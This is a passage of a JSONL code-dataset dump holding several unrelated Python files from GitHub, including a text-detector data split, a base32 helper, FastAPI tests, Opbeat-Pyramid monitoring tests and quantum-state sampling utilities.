fixnewlines(df):\n    df['text'].replace(to_replace=[r\"\\\\t|\\\\n|\\\\r\", \"\\t|\\n|\\r\"], value=[\"\", \"\"], regex=True, inplace=True)\n    return df\n\n\ndef add_class(type_, path):\n    df = pd.read_json(path, lines=True, encoding='utf8').text.to_frame()\n    df = fixnewlines(df)\n    if type_ == 'real':\n        df['class'] = 'human'\n    else:\n        df['class'] = 'machine'\n    return df\n\n\ndef concat_dfs(df1, df2):\n    df = pd.concat([df1, df2]).reset_index(drop=True)\n    df.columns = [\"text\", \"labels\"]\n    return df\n\n\nif __name__ == '__main__':\n    _dir = 
\"C:/Users/User/Desktop/Project_Main/data/\"\n\n train_fake = add_class('fake', f'{_dir}{\"xl-1542M.train.jsonl\"}')\n train_real = add_class('real', f'{_dir}{\"webtext.train.jsonl\"}')\n\n test_fake = add_class('fake', f'{_dir}{\"xl-1542M.test.jsonl\"}')\n test_real = add_class('real', f'{_dir}{\"webtext.test.jsonl\"}')\n\n concat_dfs(train_fake, train_real).to_pickle(\"train_df_500000\")\n concat_dfs(test_fake, test_real).to_pickle(\"test_df_500000\")\n","repo_name":"BenF99/Twitter-NFN-Detector","sub_path":"Project_Main/train_test_setup/CreateTrainTestSplit.py","file_name":"CreateTrainTestSplit.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21162091000","text":"__author__ = 'keroth'\n\n\nimport string\n_base32_translate = str.maketrans(\n '0123456789ABCDEFGHKLMNPQRSTUWXYZIJOV',\n '0123456789ABCDEFGHIJKLMNOPQRSTUV110U'\n)\n\n_base32_alphabet='0123456789ABCDEFGHKLMNPQRSTUWXYZ'\n\n\ndef base32encode(number):\n \"\"\"Converts an integer to a base36 string.\"\"\"\n if not isinstance(number, (int, )):\n raise TypeError('number must be an integer')\n\n base32 = ''\n sign = ''\n\n if number < 0:\n sign = '-'\n number = -number\n\n if 0 <= number < len(_base32_alphabet):\n return sign + _base32_alphabet[number]\n\n while number != 0:\n number, i = divmod(number, len(_base32_alphabet))\n base32 = _base32_alphabet[i] + base32\n\n return sign + base32\n\ndef base32decode(number):\n number = number.translate(_base32_translate)\n return int(number, 32)\n\n","repo_name":"Keroth/StorageV2","sub_path":"Label/Base32.py","file_name":"Base32.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42806861272","text":"# -*- coding: utf-8 -*-\nimport time\nfrom random import randint\nfrom typing import List\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom fastapi import FastAPI\nfrom fastapi.testclient import TestClient\n\n\ndef get_urls(url: str, limit: int) -> List[str]:\n return [url + str(randint(1, limit)) for i in range(1, limit + 1)]\n\n\ndef test_sync_api_call(client: TestClient):\n sleep = 15\n urls = get_urls('/tests/sync?duration=', sleep)\n\n temp_res = client.get('/tests/sync/?duration=10')\n print(f'temp_res: {temp_res.json()}')\n\n start = time.time()\n\n with ThreadPoolExecutor(max_workers=10) as Pool:\n response = Pool.map(client.get, urls)\n\n print(f'time required {time.time() - start}')\n for res in response:\n print(res.json())\n\n return response\n\n\ndef test_async_api_call(client: TestClient):\n sleep = 15\n urls = get_urls('/tests/async?duration=', sleep)\n\n start = time.time()\n\n with ThreadPoolExecutor(max_workers=10) as Pool:\n response = Pool.map(client.get, urls)\n\n print(f'time required {time.time() - start}')\n for res in response:\n print(res.json())\n\n return response\n","repo_name":"hodoodang/web-server-template","sub_path":"tests/api/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73043566507","text":"import cv2, os, glob\nfrom lib.camera import undistort\nfrom lib.calibrate import cal_imgs_dir, cal_imgs_glob, output_dir\n\n\n## Use the calibrated camera's undistort function to run test images\n\n## Create 'calib_undistorted/' in output_images/ path if not exists\noutput_path = output_dir+'calib_undistorted/'\nif not 
os.path.exists(output_path):\n os.makedirs(output_path)\n\n## Run camera_cal/ images and save in above folder\nimages = [(cv2.imread(imgpath), imgpath) for imgpath in cal_imgs_glob]\nfor img, imgpath in images:\n undist = undistort(img)\n name = imgpath.split(cal_imgs_dir)[1]\n cv2.imwrite(output_path+name, undist)\n\n## Run test_images/ images and save in above folder\ntest_imgs_glob = glob.glob('test_images/*.jpg')\nimages = [(cv2.imread(imgpath), imgpath) for imgpath in test_imgs_glob]\nfor img, imgpath in images:\n undist = undistort(img)\n name = imgpath.split('test_images/')[1]\n cv2.imwrite(output_path+name, undist)\n","repo_name":"fuzzthink/p4-advanced-lane-lines","sub_path":"test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13488615772","text":"import collections\nimport functools\nimport mock\nimport os\nimport unittest\n\nfrom pyramid import httpexceptions\nfrom pyramid import testing\n\nfrom opbeat_pyramid import subscribers\n\n\nMOCK_APP_ID = 'mock app id'\nMOCK_SECRET_TOKEN = 'mock secret token'\n\nSETTING_NAME = 'mock_setting'\nEXPECTED_VALUE = 'Expected Value'\nUNEXPECTED_VALUE = 'Unexpected Value'\n\nENV_SETTING_NAME = 'mock_env_setting'\nEXPECTED_ENV_VALUE = 'Expected Env Value'\nUNEXPECTED_ENV_VALUE = 'Unexpected Env Value'\n\nDEFAULT_VALUE = 'Default Value'\n\nMOCK_QUERY_STRING = 'mock&query=string'\n\nMOCK_USER_AGENT = (\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) '\n 'AppleWebKit/534.46 (KHTML, like Gecko) '\n 'Version/5.1 Mobile/9A334 Safari/7534.48.3'\n)\n\nMockRequestEvent = collections.namedtuple('RequestEvent', 'request')\n\n\nclass OpbeatSubscribersTestCase(unittest.TestCase):\n def setUp(self):\n setting_key = 'opbeat.' 
+ SETTING_NAME\n\n self.config = testing.setUp()\n self.request = testing.DummyRequest(self.config)\n\n self.request.client_addr = '0.0.0.0'\n self.request.exc_info = None\n self.request.host = 'example.com:443'\n self.request.scheme = 'https'\n self.request.user_agent = MOCK_USER_AGENT\n\n self.request.matched_route = mock.MagicMock()\n self.request.matched_route.name = 'example_view'\n\n self.settings = self.request.registry.settings = {\n setting_key: EXPECTED_VALUE,\n 'mock_setting': UNEXPECTED_VALUE,\n 'opbeat.enabled': 'true',\n 'opbeat.module_name': 'mock',\n 'opbeat.app_id': 'mock app id',\n 'opbeat.secret_token': MOCK_SECRET_TOKEN,\n 'opbeat.organization_id': MOCK_SECRET_TOKEN,\n }\n\n os.environ['OPBEAT_MOCK_ENV_SETTING'] = EXPECTED_ENV_VALUE\n os.environ['MOCK_ENV_SETTING'] = UNEXPECTED_ENV_VALUE\n\n def tearDown(self):\n del os.environ['OPBEAT_MOCK_ENV_SETTING']\n del os.environ['MOCK_ENV_SETTING']\n\n def test_get_opbeat_setting_gets_value_from_request_settings(self):\n value = subscribers.get_opbeat_setting(self.request, SETTING_NAME)\n self.assertIs(value, EXPECTED_VALUE)\n\n def test_get_opbeat_setting_gets_value_from_env_settings(self):\n value = subscribers.get_opbeat_setting(self.request, ENV_SETTING_NAME)\n self.assertEqual(value, EXPECTED_ENV_VALUE)\n\n def test_get_opbeat_setting_prefers_environment_over_settings(self):\n local_name = 'opbeat_some_setting'\n local_name_upper = local_name.upper()\n\n os.environ[local_name_upper] = EXPECTED_ENV_VALUE\n value = subscribers.get_opbeat_setting(self.request, 'some_setting')\n del os.environ[local_name_upper]\n\n self.assertEqual(value, EXPECTED_ENV_VALUE)\n\n def test_get_opbeat_setting_returns_default_when_not_set(self):\n self.assertIs(DEFAULT_VALUE, subscribers.get_opbeat_setting(\n self.request,\n 'unknown_setting',\n default=DEFAULT_VALUE,\n ))\n\n def test_get_opbeat_setting_raises_ValueError_without_a_default(self):\n break_shit = functools.partial(\n subscribers.get_opbeat_setting,\n self.request,\n 'unknown_setting',\n )\n\n self.assertRaises(ValueError, break_shit)\n\n @mock.patch('opbeat.Client')\n def test_opbeat_client_factory_returns_an_opbeat_client(self, Client):\n MOCK_RETURN_VALUE = {}\n Client.return_value = MOCK_RETURN_VALUE\n\n result = subscribers.opbeat_client_factory(self.request)\n Client.assert_called_once()\n\n self.assertIs(result, MOCK_RETURN_VALUE)\n\n @mock.patch('opbeat.Client')\n def test_opbeat_client_factory_caches_by_app_id(self, Client):\n subscribers.opbeat_client_factory(self.request)\n subscribers.opbeat_client_factory(self.request)\n Client.assert_called_once()\n\n @mock.patch('opbeat.Client')\n def test_opbeat_client_factory_wont_cache_separate_apps(self, Client):\n subscribers.opbeat_client_factory(self.request)\n\n self.settings['opbeat.app_id'] = 'Another App ID'\n subscribers.opbeat_client_factory(self.request)\n\n self.assertEqual(Client.call_count, 2)\n\n def test_setting_is_enabled_returns_true_for_truthy_values(self):\n is_enabled = functools.partial(\n subscribers.setting_is_enabled,\n self.request,\n 'truthy_value',\n )\n\n self.settings['opbeat.truthy_value'] = True\n self.assertTrue(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'true'\n self.assertTrue(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'on'\n self.assertTrue(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'yes'\n self.assertTrue(is_enabled())\n\n def test_setting_is_enabled_returns_false_for_falsy_values(self):\n is_enabled = functools.partial(\n 
subscribers.setting_is_enabled,\n self.request,\n 'truthy_value',\n )\n\n self.settings['opbeat.truthy_value'] = False\n self.assertFalse(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'false'\n self.assertFalse(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'off'\n self.assertFalse(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'no'\n self.assertFalse(is_enabled())\n\n def test_get_request_module_name_returns_module_name_from_settings(self):\n module_name = subscribers.get_request_module_name(self.request)\n self.assertEqual(module_name, 'mock')\n\n def test_get_request_module_name_returns_default_if_setting_missing(self):\n del self.settings['opbeat.module_name']\n\n module_name = subscribers.get_request_module_name(self.request)\n self.assertEqual(module_name, 'UNKNOWN_MODULE')\n\n def test_get_safe_settings_returns_settings_without_unsafe_keywords(self):\n MOCK_KEYS = [\n 'unsafe_token', 'SECRET_ID', 'MockPassword',\n 'passphrase', 'private_item', 'local_key',\n ]\n\n del self.settings['opbeat.secret_token']\n\n for key in MOCK_KEYS:\n absolute_key = 'opbeat.' + key\n self.settings[absolute_key] = 'mock unsafe token'\n\n results = subscribers.get_safe_settings(self.request)\n\n num_results = len(results.keys())\n num_settings = len(self.settings)\n num_bad_keys = len(MOCK_KEYS)\n\n for key in MOCK_KEYS:\n self.assertNotIn('opbeat.' + key, results)\n\n self.assertEqual(num_results, num_settings - num_bad_keys)\n\n def test_should_ignore_HttpException_returns_false_by_default(self):\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n self.assertFalse(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n def test_should_ignore_HttpException_returns_true_when_enabled(self):\n settings = self.settings\n settings['opbeat.ignore_http_exceptions'] = 'true'\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n self.assertTrue(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n def test_should_not_ignore_exceptions_unless_they_are_HttpExceptions(self):\n self.settings['opbeat.ignore_http_exceptions'] = 'true'\n mock_exc_info = [None, ValueError()]\n\n self.assertFalse(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n def test_should_ignore_HttpException_returns_false_when_disabled(self):\n self.settings['opbeat.ignore_http_exceptions'] = 'false'\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n self.assertFalse(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n @mock.patch('opbeat.Client')\n def test_capture_exception_ignores_errors_from_opbeat_client(self, Client):\n # NOTE: This uses a catchall which seems bad, but we do it right now.\n\n client = mock.MagicMock()\n client.capture_exception.side_effect = ValueError()\n Client.return_value = client\n\n mock_exc_info = [None, ValueError()]\n\n self.assertRaises(ValueError, client.capture_exception)\n subscribers.capture_exception(self.request, mock_exc_info, extra={})\n self.assertEqual(2, client.capture_exception.call_count)\n\n @mock.patch('opbeat.Client')\n def test_handle_exception_sends_an_exception_to_opbeat(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.request.query_string = MOCK_QUERY_STRING\n mock_exc_info = [None, ValueError()]\n\n subscribers.handle_exception(self.request, mock_exc_info)\n\n expected_data = {\n 'http': {\n 'url': 'https://example.com:443/',\n 'method': 'GET',\n 'query_string': MOCK_QUERY_STRING,\n }\n }\n\n 
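# added note: the expected 'extra' payload mirrors the metadata handle_exception attaches from the request\n        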
mock_extra_metadata = {\n 'client_ip_address': self.request.client_addr,\n 'logging_successful': 'true',\n 'url': self.request.url,\n 'user_agent': self.request.user_agent,\n }\n\n mock_extra_metadata.update(subscribers.get_safe_settings(self.request))\n\n client.capture_exception.assert_called_once_with(\n mock_exc_info,\n data=expected_data,\n extra=mock_extra_metadata,\n )\n\n @mock.patch('opbeat.Client')\n @mock.patch('opbeat_pyramid.subscribers.should_ignore_exception')\n def test_handle_exception_ignores_ignored_exceptions(self, mock, Client):\n mock.return_value = True\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n client = mock.MagicMock()\n Client.return_value = client\n\n subscribers.handle_exception(self.request, mock_exc_info)\n mock.assert_called_once_with(self.request, mock_exc_info)\n client.capture_exception.assert_not_called()\n\n def test_get_exception_for_request_returns_exc_info_if_not_None(self):\n self.request.exc_info = ''\n exc_info = subscribers.get_exception_for_request(self.request)\n self.assertIs(exc_info, self.request.exc_info)\n\n @mock.patch('sys.exc_info')\n def test_get_exception_for_request_uses_sys_as_fallback(self, _exc_info):\n e = ValueError()\n mock_exc_info = (type(e), e)\n\n self.request.exc_info = None\n _exc_info.return_value = mock_exc_info\n exc_info = subscribers.get_exception_for_request(self.request)\n self.assertEquals(exc_info, mock_exc_info)\n _exc_info.assert_called_once()\n\n @mock.patch('sys.exc_info')\n def test_get_exception_for_request_no_exception(self, _exc_info):\n self.request.exc_info = None\n _exc_info.return_value = (None, None, None)\n exc_info = subscribers.get_exception_for_request(self.request)\n self.assertIs(exc_info, None)\n _exc_info.assert_called_once()\n\n def test_opbeat_tween_gets_response_if_no_error_occured(self):\n mock_response = {}\n\n handler = mock.MagicMock()\n handler.return_value = mock_response\n\n response = subscribers.opbeat_tween(\n handler,\n self.request.registry,\n self.request,\n )\n\n self.assertIs(response, mock_response)\n handler.assert_called_once_with(self.request)\n\n @mock.patch('sys.exc_info')\n @mock.patch('opbeat_pyramid.subscribers.handle_exception')\n def test_opbeat_tween_raises_handler_exceptions(self, handle_exc, mock):\n exc_info = mock.return_value = [None, ValueError()]\n\n handler = mock.MagicMock()\n handler.side_effect = exc_info[1]\n\n break_shit = functools.partial(\n subscribers.opbeat_tween,\n handler,\n self.request.registry,\n self.request,\n )\n\n self.assertRaises(ValueError, break_shit)\n handle_exc.assert_called_once_with(self.request, exc_info)\n\n @mock.patch('sys.exc_info')\n @mock.patch('opbeat_pyramid.subscribers.handle_exception')\n def test_opbeat_tween_raises_sys_exceptions(self, handle_exc, mock):\n e = ValueError()\n exc_info = mock.return_value = [type(e), e]\n\n handler = mock.MagicMock()\n handler.return_value = ''\n\n subscribers.opbeat_tween(handler, self.request.registry, self.request)\n\n handle_exc.assert_called_once_with(self.request, exc_info)\n\n def test_get_status_code_returns_status_code_from_response(self):\n code = 415\n self.request.response.status_code = code\n self.assertEqual(code, subscribers.get_status_code(self.request))\n\n def test_get_status_code_returns_exception_code_if_not_None(self):\n self.request.exc_info = [None, httpexceptions.HTTPNotFound()]\n self.assertEqual(404, subscribers.get_status_code(self.request))\n\n def test_get_route_name_uses_view_name_if_available(self):\n self.request.view_name = 
'example.view'\n\n # Ensure these are set to ensure view_name is preferred\n self.request.matched_route.name = 'something_bad_happened'\n\n route_name = subscribers.get_route_name(self.request)\n self.assertIs(self.request.view_name, route_name)\n\n def test_get_route_name_uses_matched_route_if_available(self):\n route_name = subscribers.get_route_name(self.request)\n self.assertEqual('mock.example_view', route_name)\n\n def test_get_route_name_uses_unknown_route_name_setting_as_fallback(self):\n MOCK_UNKNOWN_ROUTE_NAME = 'Mock Unknown Route'\n\n self.request.view_name = None\n self.request.matched_route = None\n\n self.settings['opbeat.unknown_route_name'] = MOCK_UNKNOWN_ROUTE_NAME\n route_name = subscribers.get_route_name(self.request)\n self.assertEqual(route_name, MOCK_UNKNOWN_ROUTE_NAME)\n\n @mock.patch('opbeat_pyramid.subscribers.opbeat_tween')\n def test_opbeat_tween_factory_returns_a_curried_tween_function(self, mock):\n handler = {}\n\n registry = self.request.registry\n\n result = subscribers.opbeat_tween_factory(handler, registry)\n\n mock.assert_not_called()\n result(self.request)\n mock.assert_called_once_with(handler, registry, self.request)\n\n @mock.patch('opbeat.Client')\n def test_on_request_begin_starts_a_transaction(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.request.add_finished_callback = mock.MagicMock()\n\n mock_event = MockRequestEvent(self.request)\n subscribers.on_request_begin(mock_event)\n\n client.begin_transaction.assert_called_once()\n\n self.request.add_finished_callback.assert_called_once_with(\n subscribers.on_request_finished,\n )\n\n @mock.patch('opbeat.Client')\n def test_on_request_begin_is_a_noop_if_opbeat_disabled(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.settings['opbeat.enabled'] = False\n self.request.add_finished_callback = mock.MagicMock()\n\n mock_event = MockRequestEvent(self.request)\n subscribers.on_request_begin(mock_event)\n\n client.begin_transaction.assert_not_called()\n self.request.add_finished_callback.assert_not_called()\n\n @mock.patch('opbeat.Client')\n def test_on_request_finished_ends_the_current_transaction(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.request._opbeat_client = client\n\n client.end_transaction.assert_not_called()\n subscribers.on_request_finished(self.request)\n\n client.end_transaction.assert_called_once_with(\n 'mock.example_view',\n 200,\n )\n\n @mock.patch('opbeat.Client')\n def test_on_request_finished_does_nothing_if_disabled(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n client.end_transaction.assert_not_called()\n subscribers.on_request_finished(self.request)\n\n client.end_transaction.assert_not_called()\n","repo_name":"monokrome/opbeat_pyramid","sub_path":"opbeat_pyramid/subscribers_spec.py","file_name":"subscribers_spec.py","file_ext":"py","file_size_in_byte":16095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8548621922","text":"# encoding: utf-8\n\nimport torch\nimport time\nimport numpy as np\nimport multiprocessing\nfrom multiprocessing import cpu_count\nimport logging\nimport os\nfrom torch import nn, Tensor\nfrom typing import Hashable, List, Tuple, Dict, Union, Callable\nfrom torch.utils.data import Dataset\n\ndef unique(x, dim=None):\n \"\"\"Unique elements of x and indices of those unique elements\n https://github.com/pytorch/pytorch/issues/36748#issuecomment-619514810\n\n e.g.\n\n 
unique(tensor([\n [1, 2, 3],\n [1, 2, 4],\n [1, 2, 3],\n [1, 2, 5]\n ]), dim=0)\n => (tensor([[1, 2, 3],\n [1, 2, 4],\n [1, 2, 5]]),\n tensor([0, 1, 3]))\n \"\"\"\n unique, inverse_indices = torch.unique(x, sorted=True, return_inverse=True, dim=dim)\n perm = torch.arange(inverse_indices.size(0), dtype=inverse_indices.dtype,\n device=inverse_indices.device)\n inverse, perm = inverse_indices.flip([0]), perm.flip([0])\n indices = inverse.new_empty(unique.size(0)).scatter_(0, inverse, perm)\n return unique, indices, inverse_indices\n\ndef unique_row_view(data, unique_args=dict()):\n b = np.ascontiguousarray(data).view(\n np.dtype((np.void, data.dtype.itemsize * data.shape[1])))\n return np.unique(b, **unique_args)\n\nclass SampleBuffer(Dataset):\n def __init__(self, device, state_size, precision=torch.float32):\n \"\"\"\n A buffer for storing samples from Markov chain sampler, keeping the most\n probable sample for the next policy update.\n \"\"\"\n self._device = device\n if len(state_size) == 2:\n self.single_state_shape = [state_size[0]]\n self.N = state_size[0]\n else:\n self.single_state_shape = [state_size[0], state_size[1]]\n self.N = state_size[0]*state_size[1]\n self.Dp = state_size[-1] # number of physical spins\n self.pow_list = np.arange(self.N-1, -1, -1)\n self._precision = precision\n\n def update(self, states, logphis, thetas, counts, \n update_states, update_psis, update_coeffs, efflens, preload_size, batch_size):\n self.states = states\n # self.sym_states = sym_states\n self.logphis = logphis\n self.thetas = thetas\n self.counts = counts\n self.update_states = update_states\n self.update_psis = update_psis\n self.update_coeffs = update_coeffs\n self.efflens = efflens\n self.get_uniques()\n \n # self._preload_size = preload_size\n # self._batch_size = batch_size\n\n if preload_size >= self.uss_len:\n self._preload_size = self.uss_len\n self._batch_size = 0\n self._sd = 0\n else:\n self._preload_size = preload_size\n self._batch_size = batch_size\n n_sample = self.uss_len - self._preload_size\n self._sd = 1 if n_sample < self._batch_size else int(np.ceil(n_sample/self._batch_size))\n\n if self._sd > 1:\n self._preload_size += n_sample - (self._sd-1)*self._batch_size\n\n\n batch_label = np.arange(self._preload_size)\n self.preload_uss = self.unique_uss[batch_label,:]\n self.rest_unique_uss = self.unique_uss[self._preload_size:,:]\n\n # print(preload_size, self._preload_size, self.uss_len - self._preload_size)\n return\n \n def get_energy_ops(self):\n logphi = torch.from_numpy(self.logphis)\n theta = torch.from_numpy(self.thetas)\n logphi_ops = torch.from_numpy(self.update_psis[:,:,0])\n theta_ops = torch.from_numpy(self.update_psis[:,:,1])\n\n with torch.no_grad():\n delta_logphi_os = logphi_ops - logphi[...,None]\n delta_theta_os = theta_ops - theta[...,None]\n op_coeffs = torch.from_numpy(self.update_coeffs)\n self.ops_real = torch.sum(op_coeffs*torch.exp(delta_logphi_os)*torch.cos(delta_theta_os), 1)\n self.ops_imag = torch.sum(op_coeffs*torch.exp(delta_logphi_os)*torch.sin(delta_theta_os), 1)\n return \n \n def get_uniques(self):\n # calculate unique symmetry states\n # sym_ss_v0 = self.sym_states[:,0,0,:].reshape(-1, self.N).astype(np.int8)\n # self.symss_len = len(unique_row_view(sym_ss_v0))\n\n # sym_ss = self.sym_states.reshape([-1, self.Dp]+self.single_state_shape)\n # sym_ss_vs = sym_ss[:,0,:].reshape(-1, self.N).astype(np.int8)\n # _, sym_indices, self.sym_inverse_indices = unique_row_view(sym_ss_vs, \n # unique_args=dict(return_index=True, return_inverse=True))\n # 
self.unique_symss = sym_ss[sym_indices]\n\n uss = self.update_states.reshape([-1, self.Dp]+self.single_state_shape)\n ussv = uss[:,0,:].reshape(-1, self.N)\n _, indices, self.uss_inverse_indices = unique_row_view(ussv, \n unique_args=dict(return_index=True, return_inverse=True))\n self.unique_uss = uss[indices]\n self.uss_len = len(self.unique_uss)\n return \n\n def __len__(self):\n return self.uss_len - self._preload_size\n \n def cut_samples(self, preload_size=100, batch_size=100, batch_type='equal'):\n # n_sample = len(self.states) - preload_size\n n_sample = self.uss_len - preload_size\n devision_len = batch_size\n\n # if n_sample + preload_size <= batch_size:\n # self.batch_label = np.arange(n_sample)[None,...]\n # elif batch_type == 'rand':\n # self.batch_label = np.random.choice(n_sample, batch_size, replace=False)[None,...]\n # elif batch_type == 'equal':\n self.batch_label = []\n for i in range(self._sd):\n if i < self._sd - 1:\n self.batch_label.append(np.arange(i*devision_len+preload_size, (i+1)*devision_len+preload_size))\n elif i*devision_len+preload_size == n_sample+preload_size:\n self._sd -= 1\n break\n else:\n self.batch_label.append(np.arange(i*devision_len+preload_size, n_sample+preload_size))\n return\n\n def get_states(self):\n gpu_states = torch.from_numpy(self.states).to(self._precision).to(self._device)\n #gpu_sym_states = torch.from_numpy(self.unique_symss).float().to(self._device)\n #gpu_sym_ii = torch.from_numpy(self.sym_inverse_indices).to(self._device)\n\n gpu_counts = torch.from_numpy(self.counts).to(self._precision).to(self._device)\n gpu_logphi0 = torch.from_numpy(self.logphis).to(self._precision).to(self._device)\n gpu_theta0 = torch.from_numpy(self.thetas).to(self._precision).to(self._device)\n\n gpu_update_coeffs = torch.from_numpy(self.update_coeffs).to(self._precision).to(self._device)\n gpu_uss_inverse_indices = torch.from_numpy(self.uss_inverse_indices).to(self._device)\n \n pre_gpu_update_states_unique = torch.from_numpy(self.preload_uss).to(self._precision).to(self._device)\n\n return gpu_states, gpu_counts, gpu_logphi0, gpu_theta0, \\\n gpu_update_coeffs, gpu_uss_inverse_indices, pre_gpu_update_states_unique\n\n def get(self, idx=1, batch_size=100, batch_type='all'):\n \n if batch_type == 'all':\n batch_label = self.batch_label[idx]\n selected_uss = self.unique_uss[batch_label,:]\n gpu_update_states_unique = torch.from_numpy(selected_uss).to(self._precision).to(self._device)\n return dict(update_states_unique=gpu_update_states_unique)\n else: \n # random batch \n batch_label = np.random.choice(len(self.states), batch_size, replace=False)[None,...] 
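# added note: [None, ...] prepends a singleton batch axis to the sampled indices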
\n\n batch_states = torch.from_numpy(self.states[batch_label,:]).to(self._precision).to(self._device)\n batch_counts = torch.from_numpy(self.counts[batch_label,:]).to(self._precision).to(self._device)\n batch_logphi0 = torch.from_numpy(self.logphis[batch_label,:]).to(self._precision).to(self._device)\n batch_theta0 = torch.from_numpy(self.thetas[batch_label,:]).to(self._precision).to(self._device)\n batch_ucs = torch.from_numpy(self.update_coeffs[batch_label,:]).to(self._precision).to(self._device)\n batch_uss = torch.from_numpy(self.update_states[batch_label,:]).to(self._precision).to(self._device)\n return dict(states=batch_states, counts=batch_counts, logphi=batch_logphi0,\n theta=batch_theta0, ucs=batch_ucs, uss=batch_uss)\n\n def __getitem__(self, idx):\n #batch_label = self.batch_label[idx]\n selected_uss = self.rest_unique_uss[idx,:]\n gpu_update_states_unique = torch.from_numpy(selected_uss).to(self._precision).to(self._device)\n return gpu_update_states_unique\n \ndef _get_unique_states(states, logphis, thetas, ustates, upsis, ucoeffs, efflens):\n \"\"\"\n Returns the unique states, their coefficients and the counts.\n \"\"\"\n states, indices, counts = np.unique(states, return_index=True, return_counts=True, axis=0)\n logphis = logphis[indices]\n thetas = thetas[indices]\n ustates = ustates[indices]\n upsis = upsis[indices]\n ucoeffs = ucoeffs[indices]\n efflens = efflens[indices]\n return states, logphis, thetas, counts, ustates, upsis, ucoeffs, efflens\n\ndef find_states_and_ops(model, operator, states, single_state_shape ,cal_ops=False):\n with torch.no_grad():\n n_sample = states.shape[0]\n update_states = np.zeros([n_sample, operator._update_size] + single_state_shape)\n update_psis = np.zeros([n_sample, operator._update_size, 2])\n update_coeffs = np.zeros([n_sample, operator._update_size])\n efflens = np.zeros([n_sample], dtype=np.int64)\n \n if cal_ops:\n for i,state in enumerate(states):\n update_states[i], update_coeffs[i], efflen = operator.find_states(state)\n efflens[i] = efflen\n ustates = update_states[i,:efflen,:].reshape([-1]+single_state_shape)\n upsis = model(torch.from_numpy(ustates).float())\n update_psis[i,:efflen,:] = upsis.numpy().reshape([1, efflen, 2])\n else:\n for i,state in enumerate(states):\n update_states[i], update_coeffs[i], efflen = operator.find_states(state)\n efflens[i] = efflen\n ustates = update_states[i,:efflen,:].reshape([-1]+single_state_shape)\n ustates = model.pick_sym_config(torch.from_numpy(ustates)).numpy()\n update_states[i,:efflen,:] = ustates.reshape(update_states[i,:efflen,:].shape)\n return update_states, update_psis, update_coeffs, efflens\n\ndef _generate_updates(states, model, operator, single_state_shape, update_size, threads):\n \"\"\"\n Generates updated states and coefficients for an Operator.\n\n Args:\n states: The states with shape (batch size, shape of state).\n operator: The operator used for updating the states.\n state_size: shape of a state in states\n update_size: number of update_states\n\n Returns:\n The updated states and their coefficients. 
The shape of the updated\n    states is (batch size, num of updates, shape of state), where num of\n    updates is the largest number of updated states among all given states.\n    If a state has fewer updated states, its updates are padded with the\n    original state.\n\n    \"\"\"\n    n_sample = states.shape[0]\n    ustates = np.zeros([n_sample, update_size] + single_state_shape)\n    ucoeffs = np.zeros([n_sample, update_size])\n    efflens = np.zeros([n_sample], dtype=np.int64)\n\n    pool = multiprocessing.Pool(threads)\n    results = []\n    cnt = 0\n    \n    for state in states:\n        # find_states_and_ops expects a batch, so give each worker a batch of one\n        results.append(pool.apply_async(find_states_and_ops, \n                        (model, operator, state[np.newaxis], single_state_shape, )))\n    pool.close()\n    pool.join()\n\n    for cnt, res in enumerate(results):\n        # each worker returns (states, psis, coeffs, efflens); the psis are unused here\n        us, _, uc, el = res.get()\n        ustates[cnt], ucoeffs[cnt], efflens[cnt] = us[0], uc[0], el[0]\n\n    return ustates, ucoeffs, efflens\n\n# logger definitions\ndef get_logger(filename, verbosity=0, name=None):\n\n    path = filename[0:filename.rfind(\"/\")]\n    if not os.path.isdir(path):\n        os.makedirs(path)\n    if not os.path.isfile(filename):\n        fd = open(filename, mode=\"w\", encoding=\"utf-8\")\n        fd.close()\n\n    level_dict = {0: logging.DEBUG, 1: logging.INFO, 2: logging.WARNING}\n    formatter = logging.Formatter(\n        \"[%(asctime)s][%(filename)s][%(levelname)s] %(message)s\")\n    logger = logging.getLogger(name)\n    logger.setLevel(level_dict[verbosity])\n\n    if logger.hasHandlers():\n        logger.handlers.clear()\n\n    fh = logging.FileHandler(filename, \"w\")\n    fh.setLevel(level_dict[min(verbosity + 1, 2)]) # clamp so verbosity=2 stays inside level_dict\n    fh.setFormatter(formatter) \n    logger.addHandler(fh)\n\n    sh = logging.StreamHandler()\n    sh.setFormatter(formatter)\n    logger.addHandler(sh)\n\n    return logger\n\ndef rot60(A, num=1, dims=[0,1], center=[0]):\n    num = num%6\n    input_shape = A.shape\n    L = A.shape[dims[0]]\n    W = A.shape[dims[1]]\n    A = A.reshape(-1,L,W)\n    \n    X, Y = torch.meshgrid(torch.arange(W), torch.arange(L))\n    B = 